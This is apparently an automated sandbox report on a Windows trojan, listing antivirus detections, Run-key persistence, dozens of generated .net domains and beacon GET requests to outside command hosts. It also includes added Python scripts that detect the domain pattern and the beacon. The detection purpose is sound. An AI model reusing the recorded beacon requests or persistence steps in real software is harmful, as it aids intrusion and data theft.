Analysis Date: 2015-07-29 01:15:49
MD5: d96ff0fb2af92293d73eb507902e24ad
SHA1: dd7e2659e0d02a79c898c15c97b1509906d29e55

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: c23807ed81146a0870bb1670211bced5  sha1: 953a7302aebb73e1fc6424afb2df5030340506eb  size: 296960
Section .rdata  md5: b3c2d3347a368de3667058235d0f24d1  sha1: d3a9e59c0b193560603b97dfdaea32565af086cd  size: 34816
Section .data   md5: adc6497191d91445b7480e3517386709  sha1: 89c5fbc90799280c06b9668aa1506c0f62498d43  size: 98304
Timestamp: 2014-10-30 10:10:17
Packer: Microsoft Visual C++ ?.?
PEhash: f07e2747cebc98dd4f41d94c5d7f35aaafd9decb
IMPhash: 3edd1b7d22d3819f5466ca1c222270b0
AV Rising: no_virus
AV Mcafee: Trojan-FEMT!D96FF0FB2AF9
AV Avira (antivir): BDS/Zegost.Gen4
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Alwil (avast): Downloader-TLD [Trj]
AV Eset (nod32): Win32/Agent.VNC
AV Grisoft (avg): Win32/Cryptor
AV Symantec: Downloader.Upatre!g15
AV Fortinet: W32/Agent.VNC!tr
AV BitDefender: Gen:Variant.Symmi.22722
AV K7: no_virus
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.Z
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV MalwareBytes: Trojan.Zbot.WHE
AV Authentium: W32/Wonton.B2.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.FBAccountLock
AV Emsisoft: Gen:Variant.Symmi.22722
AV Zillya!: no_virus
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TSPY_NIVDORT.SMB
AV CAT (quickheal): Trojan.Dynamer.AC3
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Symmi.22722
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV CA (E-Trust Ino): no_virus
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV F-Secure: Gen:Variant.Symmi.22722

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Backup IKE Protection Framework Bus ➝ C:\Documents and Settings\Administrator\Application Data\hvudxhs\nhotuktktu.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\hvudxhs\nhotuktktu.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\hvudxhs\nhotuktktu.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\hvudxhs\nhotuktktu.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\hvudxhs\ibzyoxv.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\hvudxhs\nhotuktktu.q52cp
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\hvudxhs\nhotuktktu.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\hvudxhs\nhotuktktu.exe"

Network Details:

DNS: follownothing.net  Type: A  ➝ 95.211.230.75
DNS: knownstream.net  Type: A  ➝ 74.208.56.10
DNS: summerstream.net  Type: A  ➝ 66.96.132.53
DNS: crowdstream.net  Type: A  ➝ 184.168.221.61
DNS: crowdnothing.net  Type: A  ➝ 208.91.197.241
DNS: thoughtstream.net  Type: A  ➝ 50.63.202.54
DNS: waterstream.net  Type: A  ➝ 91.198.165.243
DNS: waterbottle.net  Type: A  ➝ 209.15.13.134
DNS: fightstream.net  Type: A  ➝ 184.168.221.32
DNS: partybottle.net  Type: A  ➝ 91.215.216.53
DNS: freshbusiness.net  Type: A  ➝ 72.52.4.120
DNS: experiencebusiness.net  Type: A  ➝ 188.40.135.139
DNS: fightcourse.net  Type: A
DNS: partywomen.net  Type: A
DNS: fightwomen.net  Type: A
DNS: freshstream.net  Type: A
DNS: experiencestream.net  Type: A
DNS: freshnothing.net  Type: A
DNS: experiencenothing.net  Type: A
DNS: freshbottle.net  Type: A
DNS: experiencebottle.net  Type: A
DNS: freshdivide.net  Type: A
DNS: experiencedivide.net  Type: A
DNS: gentlemanstream.net  Type: A
DNS: alreadystream.net  Type: A
DNS: gentlemannothing.net  Type: A
DNS: alreadynothing.net  Type: A
DNS: gentlemanbottle.net  Type: A
DNS: alreadybottle.net  Type: A
DNS: gentlemandivide.net  Type: A
DNS: alreadydivide.net  Type: A
DNS: followstream.net  Type: A
DNS: memberstream.net  Type: A
DNS: membernothing.net  Type: A
DNS: followbottle.net  Type: A
DNS: memberbottle.net  Type: A
DNS: followdivide.net  Type: A
DNS: memberdivide.net  Type: A
DNS: beginstream.net  Type: A
DNS: beginnothing.net  Type: A
DNS: knownnothing.net  Type: A
DNS: beginbottle.net  Type: A
DNS: knownbottle.net  Type: A
DNS: begindivide.net  Type: A
DNS: knowndivide.net  Type: A
DNS: summernothing.net  Type: A
DNS: summerbottle.net  Type: A
DNS: crowdbottle.net  Type: A
DNS: summerdivide.net  Type: A
DNS: crowddivide.net  Type: A
DNS: thoughtnothing.net  Type: A
DNS: waternothing.net  Type: A
DNS: thoughtbottle.net  Type: A
DNS: thoughtdivide.net  Type: A
DNS: waterdivide.net  Type: A
DNS: womanstream.net  Type: A
DNS: smokestream.net  Type: A
DNS: womannothing.net  Type: A
DNS: smokenothing.net  Type: A
DNS: womanbottle.net  Type: A
DNS: smokebottle.net  Type: A
DNS: womandivide.net  Type: A
DNS: smokedivide.net  Type: A
DNS: partystream.net  Type: A
DNS: partynothing.net  Type: A
DNS: fightnothing.net  Type: A
DNS: fightbottle.net  Type: A
DNS: partydivide.net  Type: A
DNS: fightdivide.net  Type: A
DNS: freshmanner.net  Type: A
DNS: experiencemanner.net  Type: A
DNS: freshanother.net  Type: A
DNS: experienceanother.net  Type: A
DNS: freshappear.net  Type: A
DNS: experienceappear.net  Type: A
DNS: gentlemanmanner.net  Type: A
DNS: alreadymanner.net  Type: A
DNS: gentlemananother.net  Type: A
DNS: alreadyanother.net  Type: A
DNS: gentlemanbusiness.net  Type: A
DNS: alreadybusiness.net  Type: A
DNS: gentlemanappear.net  Type: A
DNS: alreadyappear.net  Type: A
DNS: followmanner.net  Type: A
DNS: membermanner.net  Type: A
HTTP GET: http://follownothing.net/index.php?email=info@dharmams.com&method=post&len  User-Agent: (none)
HTTP GET: http://knownstream.net/index.php?email=info@dharmams.com&method=post&len  User-Agent: (none)
HTTP GET: http://summerstream.net/index.php?email=info@dharmams.com&method=post&len  User-Agent: (none)
HTTP GET: http://crowdstream.net/index.php?email=info@dharmams.com&method=post&len  User-Agent: (none)
HTTP GET: http://crowdnothing.net/index.php?email=info@dharmams.com&method=post&len  User-Agent: (none)
HTTP GET: http://thoughtstream.net/index.php?email=info@dharmams.com&method=post&len  User-Agent: (none)
HTTP GET: http://waterstream.net/index.php?email=info@dharmams.com&method=post&len  User-Agent: (none)
HTTP GET: http://waterbottle.net/index.php?email=info@dharmams.com&method=post&len  User-Agent: (none)
HTTP GET: http://fightstream.net/index.php?email=info@dharmams.com&method=post&len  User-Agent: (none)
HTTP GET: http://partybottle.net/index.php?email=info@dharmams.com&method=post&len  User-Agent: (none)
HTTP GET: http://freshbusiness.net/index.php?email=info@dharmams.com&method=post&len  User-Agent: (none)
HTTP GET: http://experiencebusiness.net/index.php?email=info@dharmams.com&method=post&len  User-Agent: (none)
Flows TCP: 192.168.1.1:1031 ➝ 95.211.230.75:80
Flows TCP: 192.168.1.1:1032 ➝ 74.208.56.10:80
Flows TCP: 192.168.1.1:1033 ➝ 66.96.132.53:80
Flows TCP: 192.168.1.1:1034 ➝ 184.168.221.61:80
Flows TCP: 192.168.1.1:1035 ➝ 208.91.197.241:80
Flows TCP: 192.168.1.1:1036 ➝ 50.63.202.54:80
Flows TCP: 192.168.1.1:1037 ➝ 91.198.165.243:80
Flows TCP: 192.168.1.1:1038 ➝ 209.15.13.134:80
Flows TCP: 192.168.1.1:1039 ➝ 184.168.221.32:80
Flows TCP: 192.168.1.1:1040 ➝ 72.52.4.120:80
Flows TCP: 192.168.1.1:1041 ➝ 72.52.4.120:80
Flows TCP: 192.168.1.1:1042 ➝ 188.40.135.139:80
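Every name the sample queried above is two English words joined and given a .net suffix, and only 12 of the 91 resolved to an address. The Python below is an added example, not part of this report or of any analysis tool: it derives the first-word and second-word vocabulary from the domains listed on this page and scans DNS log lines for a client that asks for many distinct word-pair .net names, most of them unanswered. The log format (time, client, qname, qtype, rcode) and the sample lines are constructed for the example; the vocabulary covers only the words seen here, so a generator with a larger word list would need its lists extended.

```python
import re
from collections import defaultdict

# Vocabulary taken from the domains under Network Details in this report:
# every queried name is <first word><second word>.net built from these words.
FIRST_WORDS = {
    "follow", "known", "summer", "crowd", "thought", "water", "fight", "party",
    "fresh", "experience", "gentleman", "already", "member", "begin", "woman", "smoke",
}
SECOND_WORDS = {
    "nothing", "stream", "bottle", "divide", "business", "course", "women",
    "manner", "another", "appear",
}

def split_wordpair(hostname):
    """Return (first, second) if hostname is <first><second>.net from the
    vocabulary above, otherwise None. Every split point is tried so the
    function does not depend on word lengths."""
    host = hostname.lower().rstrip(".")
    if not host.endswith(".net") or host.count(".") != 1:
        return None
    label = host[:-4]
    for i in range(1, len(label)):
        first, second = label[:i], label[i:]
        if first in FIRST_WORDS and second in SECOND_WORDS:
            return first, second
    return None

# Constructed DNS log lines (not from the report): "<time> <client> <qname> <qtype> <rcode>"
SAMPLE_LOG = """\
2015-07-29T01:16:01 192.168.1.1 follownothing.net A NOERROR
2015-07-29T01:16:01 192.168.1.1 knownstream.net A NOERROR
2015-07-29T01:16:02 192.168.1.1 fightcourse.net A NXDOMAIN
2015-07-29T01:16:02 192.168.1.1 partywomen.net A NXDOMAIN
2015-07-29T01:16:02 192.168.1.1 gentlemananother.net A NXDOMAIN
2015-07-29T01:16:03 192.168.1.1 alreadyappear.net A NXDOMAIN
2015-07-29T01:16:05 192.168.1.7 www.example.net A NOERROR
2015-07-29T01:16:06 192.168.1.7 waterbottle.net A NOERROR
2015-07-29T01:16:07 192.168.1.9 mail.example.com MX NOERROR
"""

LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")

def scan_dns_log(text, min_distinct=3):
    """Group word-pair .net A queries by client and report clients that asked
    for at least `min_distinct` distinct such names, with the NXDOMAIN count.
    A single hit (192.168.1.7 here) is background noise; a burst with many
    NXDOMAIN answers from one host is the pattern this report shows."""
    per_client = defaultdict(lambda: {"names": set(), "nxdomain": 0})
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        _, client, qname, qtype, rcode = m.groups()
        if qtype != "A" or split_wordpair(qname) is None:
            continue
        entry = per_client[client]
        entry["names"].add(qname.lower())
        if rcode == "NXDOMAIN":
            entry["nxdomain"] += 1
    return {
        client: {"distinct": len(e["names"]), "nxdomain": e["nxdomain"]}
        for client, e in per_client.items()
        if len(e["names"]) >= min_distinct
    }

if __name__ == "__main__":
    for client, stats in scan_dns_log(SAMPLE_LOG).items():
        print(f"{client}: {stats['distinct']} word-pair .net queries, "
              f"{stats['nxdomain']} NXDOMAIN")
```

The threshold matters more than the vocabulary: a legitimate host can plausibly look up one or two of these names, but the report shows a single client walking dozens of them in seconds, so alert on the count per client, not on any one domain.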

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2066 6f6c6c6f 776e6f74   .Host: follownot
0x00000070 (00112)   68696e67 2e6e6574 0d0a0d0a            hing.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a206b 6e6f776e 73747265   .Host: knownstre
0x00000070 (00112)   616d2e6e 65740d0a 0d0a0d0a            am.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2073 756d6d65 72737472   .Host: summerstr
0x00000070 (00112)   65616d2e 6e65740d 0a0d0a0a            eam.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2063 726f7764 73747265   .Host: crowdstre
0x00000070 (00112)   616d2e6e 65740d0a 0d0a0a0a            am.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2063 726f7764 6e6f7468   .Host: crowdnoth
0x00000070 (00112)   696e672e 6e65740d 0a0d0a0a            ing.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2074 686f7567 68747374   .Host: thoughtst
0x00000070 (00112)   7265616d 2e6e6574 0d0a0d0a            ream.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2077 61746572 73747265   .Host: waterstre
0x00000070 (00112)   616d2e6e 65740d0a 0d0a0d0a            am.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2077 61746572 626f7474   .Host: waterbott
0x00000070 (00112)   6c652e6e 65740d0a 0d0a0d0a            le.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2066 69676874 73747265   .Host: fightstre
0x00000070 (00112)   616d2e6e 65740d0a 0d0a0d0a            am.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2070 61727479 626f7474   .Host: partybott
0x00000070 (00112)   6c652e6e 65740d0a 0d0a0d0a            le.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2066 72657368 62757369   .Host: freshbusi
0x00000070 (00112)   6e657373 2e6e6574 0d0a0d0a            ness.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2065 78706572 69656e63   .Host: experienc
0x00000070 (00112)   65627573 696e6573 732e6e65 740d0a0d   ebusiness.net...
0x00000080 (00128)   0a                                    .
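The hex dumps above are the only place on this page where the beacon appears byte for byte, and they show why the HTTP summary's User-Agent field is blank: the request carries no User-Agent header at all, only Accept, Connection and Host, and it is sent as HTTP/1.0 with a bare `len` parameter. The Python below is an added example, not part of this report: it decodes a dump in the report's own hex-dump layout, parses the HTTP request out of it, and checks the request against that signature. The first dump above is embedded as the sample; the contrasting benign request is constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Matches one line of the report's hex-dump layout:
# "0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e"
# The capture stops at the first gap wider than one space, so the ASCII column
# is never mistaken for hex.
HEXDUMP_LINE = re.compile(
    r"^0x[0-9a-fA-F]+\s+\(\d+\)\s+((?:[0-9a-fA-F]{2,8} )*[0-9a-fA-F]{2,8})"
)

# First dump from the Raw Pcap section of this report, copied verbatim.
SAMPLE_DUMP = """\
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f406468 61726d61   mail=info@dharma
0x00000020 (00032)   6d732e63 6f6d266d 6574686f 643d706f   ms.com&method=po
0x00000030 (00048)   7374266c 656e2048 5454502f 312e300d   st&len HTTP/1.0.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a436f   .Accept: */*..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a486f73 743a2066 6f6c6c6f 776e6f74   .Host: follownot
0x00000070 (00112)   68696e67 2e6e6574 0d0a0d0a            hing.net....
"""

# Constructed ordinary browser-style request (not from the report) for contrast.
BENIGN_REQUEST = (
    b"GET /index.php?email=a@b.test HTTP/1.1\r\n"
    b"Host: www.example.net\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Accept: */*\r\n"
    b"Connection: close\r\n\r\n"
)

def hexdump_to_bytes(dump):
    """Concatenate the hex columns of every dump line into raw bytes."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEXDUMP_LINE.match(line.strip())
        if m:
            out += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(out)

def parse_http_request(raw):
    """Split a raw HTTP request into method, path, query parameters, version,
    lower-cased headers and body. Blank query values (the bare 'len') are kept."""
    text = raw.decode("latin-1")
    head, _, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    return {"method": method, "path": parts.path, "params": params,
            "version": version, "headers": headers, "body": body}

def looks_like_beacon(req):
    """Signature of the request this sample sends: HTTP/1.0 GET to /index.php
    with email, method=post and a bare len parameter, Connection: close,
    and no User-Agent header at all."""
    p = req["params"]
    return (
        req["method"] == "GET"
        and req["version"] == "HTTP/1.0"
        and req["path"] == "/index.php"
        and "email" in p and p.get("method") == "post" and "len" in p
        and req["headers"].get("connection", "").lower() == "close"
        and "user-agent" not in req["headers"]
    )

if __name__ == "__main__":
    req = parse_http_request(hexdump_to_bytes(SAMPLE_DUMP))
    print(req["headers"]["host"], req["params"], looks_like_beacon(req))
    print(looks_like_beacon(parse_http_request(BENIGN_REQUEST)))
```

The absent User-Agent is the cheapest discriminator here: proxies and web servers log an empty agent string for these requests, so a query for HTTP/1.0 GETs to /index.php with an empty User-Agent and `method=post` in the query string finds the beacon without depending on the domain list.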


Strings